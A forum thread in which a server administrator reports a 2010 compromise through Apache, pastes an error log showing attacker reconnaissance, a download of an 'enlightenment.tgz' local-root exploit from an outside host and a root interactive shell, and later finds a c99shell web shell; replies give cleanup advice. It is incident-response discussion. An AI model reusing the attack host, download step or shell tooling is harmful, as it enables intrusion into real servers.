# Got hacked through Apache with Enlightenment exploit

## linumik

http://securityreason.com/exploitalert/7189

Is there a fix for this? How do I prevent that from happening again? I can't find any information and there was no security alert (I have emerge sending me notifications when there is a problem).

Anyway, I Found this it the main log file which is usually empty as I have per site logs.

```

error: permission denied on key 'kernel.cap-bound'

error: permission denied on key 'kernel.cad_pid'

error: permission denied on key 'net.ipv4.route.flush'

error: permission denied on key 'net.ipv6.route.flush'

error: permission denied on key 'fs.binfmt_misc.register'

cat: /etc/issue.net: No such file or directory

cat: /etc/*-realise: No such file or directory

which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

error: "kern.ostype" is an unknown key

which: no lcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no ruby in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no bzip in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no suidperl in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no kav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no nod32 in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no bdcored in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no uvscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no sav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no drwebd in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no rkhunter in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no chkrootkit in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no ipfw in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no tripwire in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no shieldcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no portsentry in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no snort in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no ossec in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no lidsadm in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no tcplodg in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no sxid in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no logcheck in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no logwatch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no sysmask in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no zmbscap in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no sawmill in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no wormscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no ninja in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html

which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

which: no get in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)

--2010-07-18 06:08:20--  http://th3-0utl4ws.com/localroot/xploits/enlightenment.tgz

Resolving th3-0utl4ws.com... 178.21.112.247

Connecting to th3-0utl4ws.com|178.21.112.247|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 98102 (96K) [application/x-tar]

Saving to: `enlightenment.tgz'

     0K .......... .......... .......... .......... .......... 52%  162K 0s

    50K .......... .......... .......... .......... .....     100%  423K=0.4s

2010-07-18 06:08:21 (230 KB/s) - `enlightenment.tgz' saved [98102/98102]

[Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, shutting down

[Sun Jul 18 08:21:01 2010] [notice] Apache configured -- resuming normal operations

[Sun Jul 18 08:21:54 2010] [notice] caught SIGTERM, shutting down

[Sun Jul 18 20:42:46 2010] [notice] Apache configured -- resuming normal operations

```

And all I could find in the running processed was:

```

root     23600     1  0 06:09 ?        00:00:00 /bin/sh -i

userSite122 23618 23600  0 06:09 ?        00:00:01 [exploit] <defunct>

root     27312 23600  0 10:18 ?        00:00:00 ping www.maritime.edu

```

This doesn't look good at all. What's the best way to check the system for trojans? Or should I just reinstall it?   :Shocked: 

----------

## ppurka

You should at least install rkhunter and chkrootkit and run them. In the long term, try to reinstall from scratch.

----------

## Hu

The main payload may have been delivered in enlightenment.tgz, but some other problem allowed the attacker to execute enough code to download and use that payload.  You need to find how the first attack got onto the system.  It is the one that spammed your logs probing for various files and processes.

----------

## linumik

 *Hu wrote:*   

> You need to find how the first attack got onto the system.

 

I can't find anything in any other logs. The only traces of the attack are in apache-error.log that I posted. That's why I think it is some problem with apache or maybe php. But I can't find anything unusual in any other logs including apache logs for individual sites. I use per-user apache mod that might have an issue, too, but I can't find enough information to say for sure. 

rkhunter didn't find any rootkits, but I guess, I still better off reinstalling the system. I just want to figure out what I need to close first, so I don't have to go through it again.

----------

## Anarcho

My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log.

----------

## linumik

 *Anarcho wrote:*   

> My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log.

 

I found a script in one of the directories that is basically c99shell php script that was used to gain access. I am trying to figure out how that script got there... The script doesn't work if safe_mode is on... which wasn't. But with safe_mode many other scripts don't work either.

Anyway, about that enlightenment hack. Does anyone know if it is fixed in the latest kernel?

----------

